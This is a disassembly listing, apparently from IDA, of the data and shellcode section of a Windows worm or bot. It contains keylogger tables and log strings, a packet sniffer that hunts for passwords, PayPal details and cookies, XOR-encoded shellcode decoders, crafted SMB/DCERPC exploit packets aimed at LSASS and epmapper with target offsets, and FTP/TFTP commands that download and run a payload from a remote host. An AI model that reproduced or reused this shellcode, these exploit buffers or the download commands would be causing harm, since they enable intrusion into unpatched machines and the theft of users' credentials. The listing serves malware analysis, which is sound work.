dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_426BA4 dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_4023A7+2B6�o
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
dword_426BDC dd 7A026E02h, 201F6D1Fh, 79656B28h, 2E676F6Ch, 1F6C1F70h
; DATA XREF: sub_4022C6+AE�o
dd 2202967h, 2002BBBBh, 732520h
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_4022C6+88�o
align 4
aAb db 'ab',0 ; DATA XREF: sub_4022C6+4E�o
; sub_40EE72+2AE5�o
align 4
asc_426C1C: ; DATA XREF: sub_4022C6+2C�o
unicode 0, <\>,0
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_4023A7+228�o
align 4
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_4023A7+1E5�o
align 4
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_4023A7+8F�o
align 4
off_426C68 dd offset dword_4274E0 ; DATA XREF: sub_402688+29E�r
dd offset off_4274DC
dd offset aFtp ; "FTP"
dd offset aHttp ; "HTTP"
dword_426C78 dd 6F6C2E3Ah, 6E6967h, 3 dup(0) ; DATA XREF: sub_402688+1DE�o
dword_426C8C dd 0 ; DATA XREF: sub_402688+297�r
dd 6F6C2C3Ah, 6E6967h, 4 dup(0)
dd 6F6C213Ah, 6E6967h, 4 dup(0)
dd 6F6C403Ah, 6E6967h, 4 dup(0)
dd 6F6C243Ah, 6E6967h, 4 dup(0)
dd 6F6C253Ah, 6E6967h, 4 dup(0)
dd 6F6C5E3Ah, 6E6967h, 4 dup(0)
dd 6F6C263Ah, 6E6967h, 4 dup(0)
dd 6F6C2A3Ah, 6E6967h, 4 dup(0)
dd 6F6C2D3Ah, 6E6967h, 4 dup(0)
dd 6F6C2B3Ah, 6E6967h, 4 dup(0)
dd 6F6C2F3Ah, 6E6967h, 4 dup(0)
dd 6F6C5C3Ah, 6E6967h, 4 dup(0)
dd 6F6C3D3Ah, 6E6967h, 4 dup(0)
dd 6F6C3F3Ah, 6E6967h, 4 dup(0)
dd 6F6C273Ah, 6E6967h, 4 dup(0)
dd 6F6C603Ah, 6E6967h, 4 dup(0)
dd 6F6C7E3Ah, 6E6967h, 4 dup(0)
dd 6F6C203Ah, 6E6967h, 4 dup(0)
dd 75612E3Ah, 6874h, 4 dup(0)
dd 75612C3Ah, 6874h, 4 dup(0)
dd 7561213Ah, 6874h, 4 dup(0)
dd 7561403Ah, 6874h, 4 dup(0)
dd 7561243Ah, 6874h, 4 dup(0)
dd 7561253Ah, 6874h, 4 dup(0)
dd 75615E3Ah, 6874h, 4 dup(0)
dd 7561263Ah, 6874h, 4 dup(0)
dd 75612A3Ah, 6874h, 4 dup(0)
dd 75612D3Ah, 6874h, 4 dup(0)
dd 75612B3Ah, 6874h, 4 dup(0)
dd 75612F3Ah, 6874h, 4 dup(0)
dd 75615C3Ah, 6874h, 4 dup(0)
dd 75613D3Ah, 6874h, 4 dup(0)
dd 75613F3Ah, 6874h, 4 dup(0)
dd 7561273Ah, 6874h, 4 dup(0)
dd 7561603Ah, 6874h, 4 dup(0)
dd 75617E3Ah, 6874h, 4 dup(0)
dd 7561203Ah, 6874h, 4 dup(0)
dd 64692E3Ah, 5 dup(0)
dd 64692C3Ah, 5 dup(0)
dd 6469213Ah, 5 dup(0)
dd 6469403Ah, 5 dup(0)
dd 6469243Ah, 5 dup(0)
dd 6469253Ah, 5 dup(0)
dd 64695E3Ah, 5 dup(0)
dd 6469263Ah, 5 dup(0)
dd 64692A3Ah, 5 dup(0)
dd 64692D3Ah, 5 dup(0)
dd 64692B3Ah, 5 dup(0)
dd 64692F3Ah, 5 dup(0)
dd 64695C3Ah, 5 dup(0)
dd 64693D3Ah, 5 dup(0)
dd 64693F3Ah, 5 dup(0)
dd 6469273Ah, 5 dup(0)
dd 6469603Ah, 5 dup(0)
dd 64697E3Ah, 5 dup(0)
dd 6469203Ah, 5 dup(0)
dd 61682E3Ah, 6E696873h, 4 dup(0)
dd 6168213Ah, 6E696873h, 4 dup(0)
dd 6168243Ah, 6E696873h, 4 dup(0)
dd 6168253Ah, 6E696873h, 4 dup(0)
dd 65732E3Ah, 65727563h, 4 dup(0)
dd 6573213Ah, 65727563h, 4 dup(0)
dd 6C2E3Ah, 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
dd 79732E3Ah, 6Eh, 4 dup(0)
dd 7973213Ah, 6Eh, 4 dup(0)
dd 7973243Ah, 6Eh, 4 dup(0)
dd 7973253Ah, 6Eh, 4 dup(0)
dd 4B444320h, 207965h, 4 dup(0)
dd 4E494F4Ah, 2320h, 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
aHttp db 'HTTP',0 ; DATA XREF: _2:00426C74�o
align 4
aFtp db 'FTP',0 ; DATA XREF: _2:00426C70�o
off_4274DC dd offset byte_435249 ; DATA XREF: _2:00426C6C�o
dword_4274E0 dd 544F42h ; DATA XREF: _2:off_426C68�o
unk_4274E4 db 2 ; DATA XREF: sub_402688+2FC�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorRecvFaile db 'Error: recv() failed, returned: <%d>',0
align 4
unk_427528 db 2 ; DATA XREF: sub_402688+2AB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aSuspiciousSPac db 'Suspicious %s packet from: %s:%d - %s.',0
align 4
aPsniff db '[PSNIFF]',0 ; DATA XREF: sub_402688+235�o
align 4
unk_427578 db 2 ; DATA XREF: sub_402688+186�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorWsaioctlF db 'Error: WSAIoctl() failed, returned: <%d>.',0
align 10h
unk_4275C0 db 2 ; DATA XREF: sub_402688+103�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorBindFaile db 'Error: bind() failed, returned: <%d>.',0
align 4
unk_427604 db 2 ; DATA XREF: sub_402688+85�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorSocketF_1 db 'Error: socket() failed, returned: <%d>.',0
dword_427648 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; DATA XREF: sub_402DD7+E1�o
; sub_402DD7+21B�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_427694 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_402B84+123�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_4279F8 dd 20h, 0 ; DATA XREF: sub_402B84+136�o
dd 20h, 5C005Ch, 0
off_427A0C dd offset unk_43005C ; DATA XREF: sub_402B84+15D�o
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
dd 0
dword_427A4C dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 ; DATA XREF: sub_402B84+174�o
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_402B84+45�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_427B5C dd 18759Fh ; DATA XREF: sub_402B84+104�o
dword_427B60 dd 100139Dh ; DATA XREF: sub_402B84+FB�o
asc_427B64: ; DATA XREF: sub_4029E9+1C�o
; sub_402ACC+16�o
unicode 0, <\\>,0
align 4
off_427B6C dd offset dword_49005C ; DATA XREF: sub_4029E9+C�o
; sub_402ACC+B�o
dd offset dword_430050
dd 24h
unk_427B78 db 2 ; DATA XREF: sub_402DD7+299�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTransferComple db ' transfer complete to IP: %s',0
align 10h
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: sub_402DD7+41�o
align 8
jmp short loc_427BDA
; =============== S U B R O U T I N E =======================================
sub_427BCA proc far ; CODE XREF: sub_427BCA:loc_427BDA�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_427BD2: ; CODE XREF: sub_427BCA+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_427BD2
jmp short loc_427BDF
; ---------------------------------------------------------------------------
loc_427BDA: ; CODE XREF: _2:00427BC8�j
call near ptr sub_427BCA
loc_427BDF: ; CODE XREF: sub_427BCA+E�j
jo short loc_427C43
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_427C61
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_427C43: ; CODE XREF: sub_427BCA:loc_427BDF�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_427C61: ; CODE XREF: sub_427BCA+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_427BCA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_427D08: ; DATA XREF: sub_403249+156�o
; sub_403249+212�o
jmp short loc_427D1A
; =============== S U B R O U T I N E =======================================
sub_427D0A proc near ; CODE XREF: sub_427D0A:loc_427D1A�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_427D12: ; CODE XREF: sub_427D0A+C�j
xor byte ptr [edx+ecx], 99h
loop loc_427D12
jmp short loc_427D1F
; ---------------------------------------------------------------------------
loc_427D1A: ; CODE XREF: _2:loc_427D08�j
call sub_427D0A
loc_427D1F: ; CODE XREF: sub_427D0A+E�j
jo short near ptr dword_427C98+1Eh
cwde
cdq
cdq
retn
sub_427D0A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_427DB8 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_403249+105�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_427EA0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: _0:0040370D�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_427F2C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: _0:00403739�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_427FD8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: _0:00403760�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4280B8 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+58�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_0: ; DATA XREF: sub_403249+8A�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_42811C dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+2AA�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_428188 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+2D1�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42822C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+3B0�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4282AC dd offset loc_401493+2 ; DATA XREF: sub_403249+3DE�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_428340 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+306�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4283AC dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403249+331�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_428420 dd 0 ; DATA XREF: sub_403249+35F�o
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_4284E0 dd 1004600h ; DATA XREF: sub_403249+140�r
; sub_403249+245�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
dword_428598 dd 0A0D7325h, 0 ; DATA XREF: sub_4030E8+102�o
; sub_405144+DF�o ...
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo qu'
; DATA XREF: sub_4030E8+BE�o
db 'it >> o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
align 4
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: sub_4030E8+97�o
; ---------------------------------------------------------------------------
loc_428620: ; DATA XREF: sub_403249+177�o
jmp short loc_428628
; ---------------------------------------------------------------------------
jmp short loc_42862A
; ---------------------------------------------------------------------------
align 8
loc_428628: ; CODE XREF: _2:loc_428620�j
; DATA XREF: sub_403249+27�o ...
pop esp
pop esp
loc_42862A: ; CODE XREF: _2:00428622�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_428634 dd 1CEC8166h ; DATA XREF: sub_403249+D�r
dword_428638 dd 0E4FF07h ; DATA XREF: sub_403249+16�r
byte_42863C db 90h ; DATA XREF: sub_403A90+B2�o
db 42h, 90h, 42h
db 90h
dd offset word_429042
align 4
dword_428648 dd 10FF8h, 0 ; DATA XREF: sub_403A90+6A�o
dword_428650 dd 10FF8h ; DATA XREF: sub_403A90+79�o
dword_428654 dd 7FFDF020h, 0 ; DATA XREF: sub_403A90+162�o
dword_42865C dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_403EBA+7B�o
dd 13370000h, 0
dd 2006200h
